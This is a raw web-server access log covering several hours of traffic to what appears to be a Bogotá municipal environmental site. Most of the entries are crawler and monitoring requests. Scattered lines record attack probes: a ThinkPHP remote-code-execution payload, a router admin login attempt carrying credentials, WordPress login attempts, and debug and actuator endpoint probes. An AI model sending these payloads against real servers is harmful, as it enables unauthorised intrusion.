172.22.2.4 - - [24/Sep/2022:02:27:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:28:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:02:30:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:31:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [24/Sep/2022:02:31:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:02:31:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.73.127 - - [24/Sep/2022:02:32:22 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:02:33:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Sep/2022:02:35:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:34:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [24/Sep/2022:02:36:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [24/Sep/2022:02:37:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES135.tif HTTP/1.1" 200 65198
66.249.73.127 - - [24/Sep/2022:02:38:40 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:02:39:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40600
207.46.13.86 - - [24/Sep/2022:02:39:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001799.tif HTTP/1.1" 200 168328
201.245.192.253 - - [24/Sep/2022:02:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45134
216.245.221.92 - - [24/Sep/2022:02:40:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:39:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:41:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:02:40:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
207.46.13.40 - - [24/Sep/2022:02:43:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=7asrsgtszc326cq+mq2ew5qv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
216.245.221.92 - - [24/Sep/2022:02:45:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:46:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.188 - - [24/Sep/2022:02:46:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001773.tif HTTP/1.1" 200 347050
172.22.2.4 - - [24/Sep/2022:02:45:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:46:01 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 32715
66.249.73.127 - - [24/Sep/2022:02:47:07 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:02:46:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
157.55.39.202 - - [24/Sep/2022:02:47:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202000-2049.tif HTTP/1.1" 200 5003528
173.252.79.120 - - [24/Sep/2022:02:48:53 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
216.245.221.92 - - [24/Sep/2022:02:50:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:51:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.40 - - [24/Sep/2022:02:52:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001771.tif HTTP/1.1" 200 143002
172.22.2.4 - - [24/Sep/2022:02:51:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:02:52:50 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:02:51:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:02:55:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:56:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [24/Sep/2022:02:58:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001755.tif HTTP/1.1" 200 141956
172.22.2.4 - - [24/Sep/2022:02:56:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:02:58:40 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:02:57:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
95.217.144.236 - - [24/Sep/2022:03:00:30 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:03:00:47 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.200 - - [24/Sep/2022:03:00:59 -0500] "GET /catalogoisis/js/go.js HTTP/1.1" 200 364
201.245.192.253 - - [24/Sep/2022:03:01:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:02:15 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 304 -
207.46.13.40 - - [24/Sep/2022:03:02:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201950-1999.tif HTTP/1.1" 200 4490670
172.22.2.4 - - [24/Sep/2022:03:02:30 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 40907
66.249.73.127 - - [24/Sep/2022:03:04:23 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:03:02:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:03:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [24/Sep/2022:03:05:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:06:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:05:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
207.46.13.40 - - [24/Sep/2022:03:08:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=7asrsgtszc326cq+mq2ew5qv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
172.22.2.4 - - [24/Sep/2022:03:08:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Sep/2022:03:10:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:11:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:09:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
66.249.73.127 - - [24/Sep/2022:03:11:42 -0500] "-" 408 -
191.156.57.36 - - [24/Sep/2022:03:15:44 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [24/Sep/2022:03:15:47 -0500] "HEAD / HTTP/1.1" 200 -
191.156.57.36 - - [24/Sep/2022:03:15:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
201.245.192.253 - - [24/Sep/2022:03:16:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:14:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:16:25 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [24/Sep/2022:03:15:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
157.55.39.200 - - [24/Sep/2022:03:17:00 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 749515
207.46.13.181 - - [24/Sep/2022:03:17:27 -0500] "GET /asi-se-mueve-bogota-en-el-dia-sin-carro-y-sin-moto.html HTTP/1.1" 200 847
66.249.73.127 - - [24/Sep/2022:03:18:30 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:03:19:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41032
201.245.192.253 - - [24/Sep/2022:03:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44841
172.22.2.4 - - [24/Sep/2022:03:20:25 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
216.245.221.92 - - [24/Sep/2022:03:20:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:21:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.211 - - [24/Sep/2022:03:21:14 -0500] "GET /ciudad-bolivar-recibe-la-feria-de-servicios.html HTTP/1.1" 200 726
172.22.2.4 - - [24/Sep/2022:03:20:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:21:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
66.249.73.127 - - [24/Sep/2022:03:24:40 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:03:25:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:26:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:26:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:26:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
207.46.13.184 - - [24/Sep/2022:03:28:47 -0500] "GET /bogota-respiro-y-disfruto-del-dia-sin-carro-y-sin-moto.html HTTP/1.1" 200 845
201.245.192.253 - - [24/Sep/2022:03:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41032
201.245.192.253 - - [24/Sep/2022:03:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44841
66.249.73.127 - - [24/Sep/2022:03:30:35 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:03:30:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:31:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.188 - - [24/Sep/2022:03:33:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001754.tif HTTP/1.1" 200 127674
172.22.2.4 - - [24/Sep/2022:03:31:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:32:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52493
216.245.221.92 - - [24/Sep/2022:03:35:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:35:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.25 - - [24/Sep/2022:03:37:56 -0500] "GET /catalogoisis/js/cookies.js HTTP/1.1" 200 1369
207.46.13.86 - - [24/Sep/2022:03:38:50 -0500] "GET /BLA/resoluciones/2002RES121.tif HTTP/1.1" 404 1018
201.245.192.253 - - [24/Sep/2022:03:39:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41032
201.245.192.253 - - [24/Sep/2022:03:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44841
172.22.2.4 - - [24/Sep/2022:03:37:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:38:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [24/Sep/2022:03:40:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:40:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.25 - - [24/Sep/2022:03:41:33 -0500] "GET /BLA/resoluciones/00001785.tif HTTP/1.1" 404 1018
217.182.175.162 - - [24/Sep/2022:03:44:21 -0500] "HEAD /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 -
217.182.175.162 - - [24/Sep/2022:03:44:21 -0500] "HEAD /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 -
216.24.213.27 - - [24/Sep/2022:03:45:14 -0500] "HEAD / HTTP/1.1" 200 -
216.24.213.27 - - [24/Sep/2022:03:45:14 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Sep/2022:03:43:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
89.40.127.233 - - [24/Sep/2022:03:45:20 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 1152
89.40.112.9 - - [24/Sep/2022:03:45:20 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 1152
216.245.221.92 - - [24/Sep/2022:03:45:47 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [24/Sep/2022:03:45:54 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:03:45:55 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [24/Sep/2022:03:45:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:44:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
207.46.13.86 - - [24/Sep/2022:03:47:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001796.tif HTTP/1.1" 200 155128
157.55.39.188 - - [24/Sep/2022:03:48:07 -0500] "GET /BLA/resoluciones/00001780.tif HTTP/1.1" 404 1018
156.146.36.209 - - [24/Sep/2022:03:48:49 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
216.245.221.92 - - [24/Sep/2022:03:50:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:50:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:49:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:03:50:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
172.22.2.4 - - [24/Sep/2022:03:51:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
66.249.73.127 - - [24/Sep/2022:03:53:47 -0500] "-" 408 -
207.46.13.86 - - [24/Sep/2022:03:55:12 -0500] "GET /BLA/resoluciones/00001755.tif HTTP/1.1" 404 1018
216.245.221.92 - - [24/Sep/2022:03:55:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:03:55:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:03:55:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.25 - - [24/Sep/2022:03:57:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201150-1199.tif HTTP/1.1" 200 4191097
172.22.2.4 - - [24/Sep/2022:03:56:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.200 - - [24/Sep/2022:04:00:33 -0500] "GET /BLA/resoluciones/2002RES127.tif HTTP/1.1" 404 1018
216.245.221.92 - - [24/Sep/2022:04:00:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:00:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
222.185.97.212 - - [24/Sep/2022:04:02:16 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
172.22.2.4 - - [24/Sep/2022:04:01:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:01:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
172.22.2.4 - - [24/Sep/2022:04:03:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [24/Sep/2022:04:05:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:05:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:04:06:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:07:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [24/Sep/2022:04:07:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
157.55.39.200 - - [24/Sep/2022:04:10:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2FRES+2007+1201+AL+1300%2F HTTP/1.1" 200 26864
216.245.221.92 - - [24/Sep/2022:04:10:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:10:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:04:12:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:13:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
157.55.39.202 - - [24/Sep/2022:04:15:37 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 304 -
216.245.221.92 - - [24/Sep/2022:04:15:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:15:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:04:15:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
34.90.17.75 - - [24/Sep/2022:04:18:36 -0500] "GET / HTTP/1.1" 200 4720
34.90.17.75 - - [24/Sep/2022:04:18:36 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Sep/2022:04:19:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41035
201.245.192.253 - - [24/Sep/2022:04:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44817
157.55.39.188 - - [24/Sep/2022:04:19:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001767.tif HTTP/1.1" 200 139152
172.22.2.4 - - [24/Sep/2022:04:18:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Sep/2022:04:20:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:20:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:04:19:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
172.22.2.4 - - [24/Sep/2022:04:24:30 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
216.245.221.92 - - [24/Sep/2022:04:25:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:25:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:04:24:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:25:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
40.77.189.82 - - [24/Sep/2022:04:28:21 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [24/Sep/2022:04:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41035
201.245.192.253 - - [24/Sep/2022:04:29:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44817
216.245.221.92 - - [24/Sep/2022:04:30:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:30:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.200 - - [24/Sep/2022:04:31:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001069.tif HTTP/1.1" 200 134412
172.22.2.4 - - [24/Sep/2022:04:30:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
196.171.1.1 - - [24/Sep/2022:04:32:27 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [24/Sep/2022:04:32:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
196.171.1.1 - - [24/Sep/2022:04:32:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
157.55.39.25 - - [24/Sep/2022:04:32:43 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 10351
157.55.39.25 - - [24/Sep/2022:04:32:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001768.tif HTTP/1.1" 200 148140
172.22.2.4 - - [24/Sep/2022:04:31:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
172.22.2.4 - - [24/Sep/2022:04:32:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
157.55.39.200 - - [24/Sep/2022:04:35:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=8458ji-kjssx8tzikwlncqvq.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
216.245.221.92 - - [24/Sep/2022:04:35:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:35:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:04:35:59 -0500] "-" 408 -
196.171.1.1 - - [24/Sep/2022:04:36:04 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [24/Sep/2022:04:36:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
196.171.1.1 - - [24/Sep/2022:04:36:12 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
45.33.80.237 - - [24/Sep/2022:04:36:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [24/Sep/2022:04:36:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.80.237 - - [24/Sep/2022:04:36:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
157.55.39.188 - - [24/Sep/2022:04:37:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/2514.tif HTTP/1.1" 200 97186
172.22.2.4 - - [24/Sep/2022:04:36:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49689
172.22.2.4 - - [24/Sep/2022:04:36:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:36:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [24/Sep/2022:04:39:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41035
201.245.192.253 - - [24/Sep/2022:04:39:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44817
172.22.2.4 - - [24/Sep/2022:04:38:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [24/Sep/2022:04:40:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:40:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [24/Sep/2022:04:41:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001772.tif HTTP/1.1" 200 168320
207.46.13.86 - - [24/Sep/2022:04:42:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001760.tif HTTP/1.1" 200 170740
207.46.13.40 - - [24/Sep/2022:04:43:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=7asrsgtszc326cq+mq2ew5qv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
172.22.2.4 - - [24/Sep/2022:04:41:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.181 - - [24/Sep/2022:04:44:03 -0500] "GET /porque-tu-vida-vale-haz-parte-del-simulacro-distrital-de-evacuacion-este-4-de-octubre.html HTTP/1.1" 200 810
172.22.2.4 - - [24/Sep/2022:04:42:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
66.220.149.13 - - [24/Sep/2022:04:45:32 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 206 959
66.220.149.2 - - [24/Sep/2022:04:45:32 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 206 959
216.245.221.92 - - [24/Sep/2022:04:45:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:45:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.188 - - [24/Sep/2022:04:48:13 -0500] "GET /catalogoisis/js/limpiarcombinada.js HTTP/1.1" 200 207
172.22.2.4 - - [24/Sep/2022:04:47:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:48:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [24/Sep/2022:04:50:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:04:50:47 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.188 - - [24/Sep/2022:04:51:44 -0500] "GET /catalogoisis/js/aceptarlimpiar.js HTTP/1.1" 200 331
157.55.39.202 - - [24/Sep/2022:04:54:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001775.tif HTTP/1.1" 200 172282
66.249.73.97 - - [24/Sep/2022:04:54:43 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:04:55:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Sep/2022:04:53:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:04:55:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:04:55:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:54:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [24/Sep/2022:04:55:10 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 56014
207.46.13.40 - - [24/Sep/2022:04:58:19 -0500] "GET /POT-2013/Cartografia/15_Sistema%20de%20Movilidad%20_Secciones%20Viales_Circuitos_movilida.pdf HTTP/1.1" 304 -
107.21.132.156 - - [24/Sep/2022:04:59:15 -0500] "GET /bogota-respiro-y-disfruto-del-dia-sin-carro-y-sin-moto.html HTTP/1.1" 200 845
201.245.192.253 - - [24/Sep/2022:05:00:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [24/Sep/2022:05:00:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:04:59:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:05:00:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
